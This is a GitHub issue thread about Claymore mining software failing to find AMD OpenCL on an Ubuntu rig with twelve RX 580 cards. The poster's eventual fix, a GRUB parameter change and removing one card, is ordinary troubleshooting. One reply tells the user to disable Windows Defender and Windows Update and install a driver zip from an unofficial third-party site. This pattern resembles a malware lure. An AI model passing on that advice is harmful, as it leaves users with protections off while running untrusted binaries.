### ISSUE TITLE
No AMD OpenCL found with Claymore

### ISSUE THREAD

**Issue by vwil311** [nanopool/Claymore-Dual-Miner#236]
https://imgur.com/a/kJJ8P

MOBO: Asus B250 Mining Expert

Cards: Rx 580 (12 of them)

Claymore was working this morning and then I decided to add more cards (5 to be exact) and received this error message (and started getting the purple screen / login loop again but I don't really care about that). Tried redownloading drivers with --opencl=legacy and rocn, neither worked. Tried dling drivers normally, didn't work. Added and then removed nomodset to grub, didn't work. I saw that others were having thsi error recently too but none of the solutions worked; any ideas?

Thanks for your help in advance. : ]

**Comment by asurum** [comment]
it seems that your driver is not working in a proper way so turn windows defender off and also turn the windows update assistant off, for turning this off you can search on youtube in this regard, and then install the below Blockchain mining driver for AMD RX580:
http://how-to-mine.com/softwares/Drivers/AMD-Cards/AMD-Radeon_RX-Series/Radeon_Driver_Blockchain_Edition.zip

**Comment by vwil311** [comment]
Thanks for your response. Yes, the driver is most certainly the issue but I initially solved this problem by modifying a line in grub to the following: GRUB_CMDLINE_LINUX_DEFAULT="quiet splash amdgpu.vm_fragment_size=9" as suggested by this link: https://github.com/nanopool/Claymore-Dual-Miner/issues/46. This allowed claymore to recognize the cards but it then started to crash after 10 mins or so with a "Watchdog: Hangs in OpenCl call, exit error". At first I thought it was a PSU issue but after many hours of troubleshooting, I narrowed it down to a single card and just removed that ard from the rig (I'll probably just return it). Due to the first fix that I implemented, I can no longer use the GUI functionality of ubuntu but the rig now appears to run fairly stable and averages about 25 Mh/s per card on the Ethhash alg. A bit lower than I would like but I kind of am tired of dealing with amd and their shitty drivers so I'll just deal with it for now. 

I would pretty mush have to do a fresh install and wipe everything with ddu to get the drivers you linked to work properly and I'm not willing to do this at this point. I'm guessing that this is why Nvidia cards cost more. I feel like not dealing with all of these driver headaches may make the experience of build rigs a bit better (just a guess though). I did learn a lot though so I guess that's something.

Once again though, I really do appreciate your help and I hope others find the same in my post.

TLDR: I changed a line in GRUB, removed a card that seemed to have a bad driver install, and currently run everything via command line w/o GUI interface.
